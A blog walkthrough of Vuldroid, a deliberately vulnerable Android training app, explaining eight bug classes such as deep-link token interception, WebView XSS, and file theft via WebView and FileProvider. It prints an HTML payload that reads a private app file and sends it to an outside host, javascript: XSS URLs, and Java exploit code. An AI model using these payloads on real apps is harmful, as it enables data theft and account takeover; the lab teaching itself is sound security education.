[UPDATED]Vuldroid App Walkthrough

Akshansh JaisWal
7 min readAug 31, 2020

--

Hi everyone I hope that you all are well and good, recently I have been learning about security bugs that arise in Android apps from the static code level while learning the concepts I created a Vuldroid which is a vulnerable app that consists of the following Vulnerabilities:

  • Steal Password ResetTokens/MagicLoginLinks
  • Webview Xss via Exported Activity
  • Webview Xss via DeepLink
  • Stealing Files via Webview
  • Stealing Files via Fileprovider
  • Intent Sniffing Between Two Applications
  • Reading User Email via Broadcasts
  • Command Execution via Malicious App

Links- APKS

This is a spoiler to the labs so if you want to try reproducing the issues by your own here’s the repository to that. Also, some of these vulnerabilities might not have a high impact if you are looking from a Bug bounty perspective. So let's begin on the application as we install we get a Login screen.

So our first vulnerable area is

1.Steal Password ResetTokens/MagicLoginLinks

Here first we need to signup as we are going to intercept our password reset token by malicious application we are using firebase for the purpose. Click on login and you can see a Forgot Password option enter your email and click on reset.

Now as we receive a password reset link on clicking this we get redirected to our application where we have built a Webview to process the reset process so lets look at the vulnerability:

Manifest File

So we have used deeplink to process the activity but the problem here lies that we are not setting deeplink to be opened only by our activity i.e we have not set it to

<intent-filter android:autoVerify="true">

As in the documentation, Developer Guide its recommended to verify sensitive links like magic login and password reset that are being processed by your application to do so we need to set autoVerify and assets link on our controlled domain which would allow the link to be only be intercepted by our app.

So In order to exploit this, we write our application to intercept the token we will create our similar deeplink and when clicking on the link select our malicious Apk to intercept the token which can be sent to a remote attacker. So in our ExploitApp, we have built an activity where:

we are taking the token from the intent and displaying in Textview.

Here's a sample report which was reported to Shopify and got rewarded 500$ Account takeover intercepting magic link for Arrive app

Next, After we complete this lets login to our dashboard where we can see various activities.

2.XSS via Exported Webview

Here we have our First Activity Youtubeviewer which loads youtube.com in a webview so in this case the activity is exported and checks if an intent _url is passed as a parameter

if it is, it loads that URL so via our ExploitAPK we can launch this XSS attack by passing intent_url as javascript: prompt(‘Hey’)

3.Webview Xss via DeepLink

In our third Activity blogsviewer, we can see in our manifest files that all URLs from the medium.com are accepted as deep link parameter if they have query URL with ?url= so if we have something as

medium.com?url=javascript:prompt(‘Enter Your Password’)

Deeplink Xss

4.Stealing Files via Webview

Here first we can see that in our webview settings of BlogsViewer we have enabled webSettings.setAllowFileAccessFromFileURLs(true);

this allows file:/// protocol to load file based content across XMLHTTPRequest so this can be used as a remote attack vector to steal files , next as you can observe from manifest we have https://medium.com deeplink which accepts URL as parameter so we can open file:/// URLs as well via this example medium.com?url=file:///sdcard/test.html

Now we can create a file with HTML as

<!DOCTYPE html>
<html>
<body>
<h1>File Sent to Server</h1>
<script>
function sendmefiles(filepath, url){
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
var upload = new XMLHttpRequest();
upload.open("GET", url + "?" + this.responseText , false)
upload.send()
};
xhttp.open("GET", filepath, false);
xhttp.send();
}
window.onload=sendmefiles("file:///data/user/0/com.vuldroid.application/files/example.txt", "https://burpcollaborator.com")
</script>
</body>
</html>

Now we can load this file in vuldroid app via deeplink and send the notes secret file to remote server the file payload we need to hit is:

http://medium.com?url=file:///exploit.html

5.Stealing Files via FileProvider

We have Routing Activity which accepts any intent to be passes directly to it and since this activity is exported it can be opened via other apps as well

Also in vuldroid app we have a Fileprovider which accepts all path to be accessed so now this can be used by other applications to be opened inside their app lets see the exploit we built .

In vuldroid exploit app we have used two intents to open fileprovider and steal the file as:

Intent extra = new Intent();
extra.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION | Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
extra.setClassName(getPackageName(), "com.notify.vuldroidexploit.FileStealDisplay");
extra.setData(Uri.parse("content://com.vuldroid.application.provider/"));

Intent intent = new Intent();
intent.setClassName("com.vuldroid.application", "com.vuldroid.application.RoutingActivity");
intent.putExtra("router_component", extra);
startActivity(intent);

Now to display the file we need to pass this to inputstream and inputreader then we can print this i have used a simple Textview to display in our exploit application

TextView t1=findViewById(R.id.filestealv);
Uri uri = Uri.parse(getIntent().getDataString() + "root/data/data/com.vuldroid.application/files/example.txt");

try {
InputStream i = getContentResolver().openInputStream(uri);
InputStreamReader isReader = new InputStreamReader(i);
BufferedReader reader = new BufferedReader(isReader);
StringBuffer sb = new StringBuffer();
String str;
while((str = reader.readLine())!= null){
t1.setText(str);
i.close();
}

}catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}

6.Intent Sniffing Between Two Applications

In android to share messages between applications if you are using intents to share to send messages in between them generally the most basic approach is to add class name in intent and pass the message but other way also is to add intent.setAction(“listenerName”) here application assumes that only intended listeners would be available to receive our message

Sender File
Reciever Ends

Here in the above image is our send activity and receiver should have the manifest with receive filter action and intent method to display it so the problem here is our Exploit App can be installed in the device and when a message is sent from the original app our activity will also be in open via method this attack will best work if the receiver app is not present on device in that case only our exploit app is installed so the user won't be prompted and we can easily receive it in our app. To exploit download the Recievemsg.apk and send normally the message will be received by our recievemsg app next install our malicious app this time you will also be prompted with option of our exploit app.

7. Reading User Email via Broadcasts

In the email viewer activity, we can see our email when we open our activity we are using intents to start our broadcast receiver which in turn sends us with our Firebase registered Email because we have exported our receiver so any app has potential to open it

Broadcast receiver

Here we have registered our receiver to return a toast message of email but as a malicious application we just have to register a receiver with same name and call it here i have used a button in our ExploitApk

Once we see email viewer in MainApplication move to Exploit APP and click the button you can still be able to get a toast of your email on button press.

8. Command Execution via Malicious App

I have covered this and and all the above vulnerabilities in my red team village talk at HacktivityCon 2021 you can find the video here https://www.youtube.com/watch?v=p87T-PhVx-g

So with this, we come to end for walkthrough I hope you learned something from these Vulnerabilities shown above. Thank you so much for spending time reading this If you have any feedback and suggestions about this Vuldroid feel free to reach out to me I will try to make more improvements and build a better version in the next release.

Feel free to connect with me on Twitter, Linkedin, Website

--

--

No responses yet